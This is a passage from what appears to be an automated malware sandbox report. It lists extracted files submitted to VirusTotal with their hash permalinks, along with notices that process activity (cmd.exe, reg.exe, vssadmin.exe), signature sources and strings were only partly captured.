- Extracted file "AcroRdIF.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/ad0b2666d4f6a7291b98c46f6a17a7bb2e1fe04bbb802a4712f626aa928b6468/analysis/1501090989/")
- Extracted file "AcroTextExtractor.exe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/2e4fa98aff8f75dfc7bc4d3dc6e4b929836d472eefe2392091f18f34996bbdd6/analysis/1501090985/")
- Extracted file "AdobeXMP.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/383b5064e408e952bd53fc2ca2553d29faf9f8c01ae1aee369666d95201f153a/analysis/1501090988/")
- Extracted file "Application Verifier.lnk" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/68ef1a530ee8548fbc2a0b8b780311aa11c7261cc8c6953b88838832512e76d7/analysis/1501090963/")
- Extracted file "Au3Check.exe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/cea740b11a4c4901bf046adcdbe7ef121d0744ebabf8b894a0674677afbfeafb/analysis/1501090984/")
- Extracted file "AutoItX.chm" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/27810c5a06822d9c5eeac2c4e92d3aed4bd4a79e93a01b744b93731daab1d24f/analysis/1501090981/")
- Extracted file "AutoItX3.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/fbf0ced1bc0b94fb2f95abc17bb1c983c081218d643479d8c8f088c905069e9e/analysis/1501090992/")
- Extracted file "BIB.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/e1f0cf2186d6b4b40295756fab35d630abb2513710144b9df01361e254583b9f/analysis/1501090959/")
- Extracted file "BazisVirtualCDBus.inf" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/362b9905a8e6f5d6b9f133411eb2e1bffdc3aba7eb6b70a8ccfa4e297b4cf1f7/analysis/1501090925/")
- Extracted file "CSS7DATA000A.DLL" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/b0c1f64da9e03f2947854ca0b251b90267ef2043355a25167506d3050612e434/analysis/1501090962/")
- Extracted file "Desktop.lnk" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/27cf97a0a75ffd8debca2551f2e634436946c502f43ba500308d6c2059e8bbda/analysis/1501090987/")
- Extracted file "agestore.exe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/6e070507e84c4784cddbb862c19496826844f3a327e85e9e2173e05788184870/analysis/1501090986/")
- Extracted file "autoexec.bat" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/9e55f985141ad6c2491573f16de5d521474027b8c6805d412395ff147223574f/analysis/1501090919/")
- Extracted file "c1.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/23dfbf3420169638f05e4693c4c265922d3d1f060f20bac3a8e67ebacaa63008/analysis/1501090950/")
- Extracted file "c1xx.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/0c1ccfa0275aa0f430ea7185be106fb549a3c6e3e1b279a5e09551f20db67b53/analysis/1501090958/")
- Extracted file "c2.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/104f11a63852bcd2238f849d59d05c96c42764a4285fb8f179ec524451ff74c3/analysis/1501090947/")
- Extracted file "c2.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/762c3c639bea88452d26269bd11aa267222f2a9ab5e9e7b200f09a11f095334f/analysis/1501090934/")
- Extracted file "cvtres.exe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/acbf4e042761d9ccf56c99aadf883fd597c319d9cec84ff1137ebe60898f1d43/analysis/1501090982/")
- Extracted file "dH1rDN9f9.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/53a5ab5df85b6cb1ef60d4cff36199cddcc7b1e808cbefd985adbf173259a006/analysis/1501090978/")
- Extracted file "dbghelp.dll" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/241b6a75125f76f59811017f4865d37d9fde56c4d160895e0ce4271e459dacbd/analysis/1501090996/")
- Not all file accesses are visible for attrib.exe (PID: 3572)
- Not all file accesses are visible for attrib.exe (PID: 3736)
- Not all file accesses are visible for cmd.exe (PID: 1092)
- Not all file accesses are visible for cmd.exe (PID: 3468)
- Not all file accesses are visible for cmd.exe (PID: 884)
- Not all file accesses are visible for reg.exe (PID: 3576)
- Not all file accesses are visible for reg.exe (PID: 3580)
- Not all file accesses are visible for reg.exe (PID: 3588)
- Not all file accesses are visible for reg.exe (PID: 3668)
- Not all file accesses are visible for reg.exe (PID: 3680)
- Not all file accesses are visible for reg.exe (PID: 3720)
- Not all file accesses are visible for vssadmin.exe (PID: 1236)
- Not all file accesses are visible for vssadmin.exe (PID: 1940)
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "binary-0" are available in the report
- Not all sources for signature ID "binary-10" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all sources for signature ID "registry-25" are available in the report
- Not all sources for signature ID "registry-55" are available in the report
- Not all sources for signature ID "string-0" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Touched the maximum number of extracted files (2000), report might not contain information about some extracted files